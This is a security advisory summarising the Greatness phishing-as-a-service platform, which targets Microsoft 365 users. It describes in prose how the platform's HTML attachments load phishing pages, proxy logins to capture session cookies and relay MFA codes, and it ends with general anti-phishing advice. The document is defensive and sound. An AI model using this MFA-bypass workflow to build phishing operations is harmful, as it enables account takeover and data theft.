Cyber Security Threat Summary:
The platform Greatness, which offers a phishing-as-a-Service, witnessed a surge in its activities as it focuses on targeting organizations that use Microsoft 365 in the United States, Canada, the U.K., Australia, and South Africa. As a widely cloud-based productivity platform, Microsoft 365 is highly coveted by cybercriminals who seek to pilfer data or login credentials for exploitation in network intrusions. According to a recent report from Cisco Talos, researchers have revealed that the Greatness phishing platform was established in the middle of 2022, with a significant upsurge in its operations in December 2022, and then again in March 2023. The majority of the targets are situated in the United States, with a significant number of victims operating in diverse sectors, including manufacturing, healthcare, technology, education, real estate, construction, finance, and business service.

To initiate an attack, the user of the services accesses the Greaness' admin panel using their API key and submitting a register of targeted email addresses. Subsequently, the PhaaS platform assigns infrastructure, including the server to host the phishing page and generating the HTML attachment.

“The affiliate then crafts the email content and provides any other material or changes to the default settings as needed. The service then emails the victims, who receive a phishing email with an HTML attachment. When this attachment is opened, an obfuscated JavaScript code is executed in the browser to connect with the 'Greatness' server to fetch the phishing page that will be displayed to the user. The phishing service will automatically inject the target's company logo and background image from the employer's actual Microsoft 365 login page. The victim only enters their password on the convincing phishing page, as Greatness pre-fills the correct email to create a sense of legitimacy. At this stage, the phishing platform acts as a proxy between the victim's browser and the actual Microsoft 365 login page, handling the authentication flow to obtain a valid session cookie for the target account. If the account is protected by two-factor authentication, Greatness will prompt the victim to provide it while triggering a request on the real Microsoft service, so the one-time code is sent to the target's device” (Bleeping Computer, 2023) Greatness, then, enables the phishing actor to authenticate themselves as the victim on the actual Microsoft platform and transmit the authenticated session cookie to the affiliate, either via a Telegram channel or on the services web panel, once the MFA code is provided.

Security Officer Comments:
The phishing-as-a-service platform, Greatness encompasses all the essential components necessary for a novice phishing actor to carry out a successful phishing campaign. . As Cisco notes authenticated sessions usually expire after a certain period, which is why the telegram bot is utilized to notify the attacker about valid cookies promptly to ensure they can gain access rapidly if the target is valuable. Once obtained, attackers can employ this session cookie to infiltrate the victim's emails, files, and data in Microsoft 365 services. Moreover, the stolen credentials are frequently exploited to breach corporate networks, leading to more malicious activities, such as ransomware deployment.

Suggested Corrections:
Users should always be cautious of individuals or organizations that ask for personal information. Most companies will not ask for sensitive data from its customers. If in doubt, users should verify with the company itself to avoid any potential issues.

Users should always take a close look at the sender’s display name when checking the legitimacy of an email. Most companies use a single domain for their URLs and emails, so a message that originates from a different domain is a red flag.

As a general rule, users should not click links or download files even if they come from seemingly “trustworthy” sources.

Check for mismatched URLs. While an embedded URL might seem perfectly valid, hovering above it might show a different web address. In fact, users should avoid clicking links in emails unless they are certain that it is a legitimate link.

Users should always be on the lookout for any grammatical errors and spelling mistakes. Legitimate companies will often employ proofreaders and editors who ensure that the materials they send out are error-free.

Users should not be frightened or intimidated by messages that have an alarmist tone. They should double check with the company if they are uncertain about the status of their accounts.

Phishing emails are designed to be sent to a large number of people, so they need to be as impersonal as possible. Users should check whether the message contains a generic subject and greeting, as this can be a sign of a phishing attempt.

Although not every end user has access to advanced anti-phishing software, they can still use the built-in protection of their email clients to filter messages. One example is setting the email client to block all images unless approved.

Legitimate companies will never send confirmation emails unless there are specific reasons for doing so. In fact, most companies will avoid sending unsolicited messages unless it’s for company updates, newsletters, or advertising purposes.

Users should always take the context of an email or message into account. For example, most online accounts do away with viewable member numbers, so users should be wary if they receive emails containing a “member number” for services that generally don’t use them.

It is important to take note of unusual information in the text of the message. Any mentions of operating systems and software that are not typically used by consumers can often be indicators of a phishing attempt.

If it seems suspicious, it probably is. Users should always err on the side of caution when it comes to sending out personally identifiable information through messages and emails.

Link(s):
https://www.bleepingcomputer.com/